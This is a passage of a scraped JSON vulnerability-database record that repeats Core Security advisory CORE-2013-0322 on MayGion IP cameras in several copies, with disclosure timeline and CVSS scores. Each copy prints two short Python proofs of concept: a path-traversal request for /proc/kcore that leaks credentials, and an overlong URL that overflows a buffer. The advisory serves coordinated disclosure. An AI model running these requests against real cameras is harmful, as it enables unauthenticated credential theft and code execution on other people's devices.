*About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com.\n\n11. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations.\n\nCore Security's software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company's Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com.\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2013 Core Security\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. 
*PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-10T09:47:16", "description": "MayGion IP cameras suffer from path traversal and buffer overflow vulnerabilities.", "edition": 2, "published": "2013-05-29T00:00:00", "type": "zdt", "title": "MayGion IP Camera Path Traversal / Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1605", "CVE-2013-1604"], "modified": "2013-05-29T00:00:00", "id": "1337DAY-ID-20823", "href": "https://0day.today/exploit/description/20823", "sourceData": "MayGion IP Cameras multiple vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n\r\n3. *Vulnerability Description*\r\n\r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n\r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\n . 
H.264 ipcam firmware 2013.04.22.\r\n\r\n6. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. *User Credentials Leaked via Path Traversal*\r\n\r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n7.2. *Buffer overflow*\r\n\r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n8. *Report Timeline*\r\n\r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n\r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n\r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n\r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n\r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n\r\n. 
2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20823"}], "packetstorm": [{"lastseen": "2016-12-05T22:13:29", "description": "", "published": "2013-05-28T00:00:00", "type": "packetstorm", "title": "MayGion IP Camera Path Traversal / Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1605", "CVE-2013-1604"], "modified": "2013-05-28T00:00:00", "id": "PACKETSTORM:121787", "href": "https://packetstormsecurity.com/files/121787/MayGion-IP-Camera-Path-Traversal-Buffer-Overflow.html", "sourceData": "`Core Security - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nMayGion IP Cameras multiple vulnerabilities \n \n1. *Advisory Information* \n \nTitle: MayGion IP Cameras multiple vulnerabilities \nAdvisory ID: CORE-2013-0322 \nAdvisory URL: \nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities \nDate published: 2013-05-28 \nDate of last update: 2013-05-28 \nVendors contacted: MayGion \nRelease mode: Coordinated release \n \n2. *Vulnerability Information* \n \nClass: Path traversal [CWE-22], Buffer overflow [CWE-119] \nImpact: Code execution, Security bypass \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2013-1604, CVE-2013-1605 \n \n3. *Vulnerability Description* \n \nMultiple vulnerabilities have been found in MayGion IP cameras [1] based \non firmware v09.27 and below, that could allow an unauthenticated remote \nattacker: \n \n1. [CVE-2013-1604] to dump the camera's memory and retrieve user \ncredentials, \n2. [CVE-2013-1605] to execute arbitrary code. \n \n4. *Vulnerable Packages* \n \n. MayGion IP cameras based on firmware 2011.27.09. \n. Other firmware versions are probably affected too but they were not \nchecked. \n \n5. *Non-Vulnerable Packages* \n \n. H.264 ipcam firmware 2013.04.22. \n \n6. 
*Credits* \n \nThese vulnerabilities were discovered and researched by Nahuel Riva and \nFrancisco Falcon from Core Exploit Writers Team. \n \n7. *Technical Description / Proof of Concept Code* \n \n7.1. *User Credentials Leaked via Path Traversal* \n \n[CVE-2013-1604] The following Python code exploits a path traversal and \ndumps the camera's memory. Valid user credentials can be extracted from \nthis memory dump by an unauthenticated remote attacker. \n \n/----- \nimport httplib \n \nconn = httplib.HTTPConnection(\"192.168.100.1\") \nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\") \nresp = conn.getresponse() \ndata = resp.read() \nconn.close() \n-----/ \n \n7.2. *Buffer overflow* \n \n[CVE-2013-1605] The following Python script can be used to trigger the \nvulnerability without authentication. As a result, the Instruction \nPointer register (IP) will be overwritten with 0x61616161, which is a \ntypical buffer overrun condition. \n \n/----- \nimport httplib \n \nconn = httplib.HTTPConnection(\"192.168.100.1\") \nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\") \nresp = conn.getresponse() \ndata = resp.read() \nconn.close() \n-----/ \n \n8. *Report Timeline* \n \n. 2013-05-02: \nCore Security Technologies notifies MayGion of the vulnerabilities. \nPublication date is set for May 29th, 2013. \n \n. 2013-05-02: \nVendor asks for a report with technical information. \n \n. 2013-05-03: \nA draft advisory containing technical details sent to MayGion team. \n \n. 2013-05-03: \nVendor notifies that all vulnerabilities were fixed in the last firmware \nversion, released April 22nd, 2013. \n \n. 2013-05-09: \nCore asks for a list of affected devices and firmware. No reply received. \n \n. 2013-05-28: \nAdvisory CORE-2013-0322 is published. \n \n9. *References* \n \n[1] http://www.maygion.com \n \n10. 
*About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n11. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n12. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2013 Core Security \nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n13. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. 
\n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121787/CORE-2013-0322.txt"}]}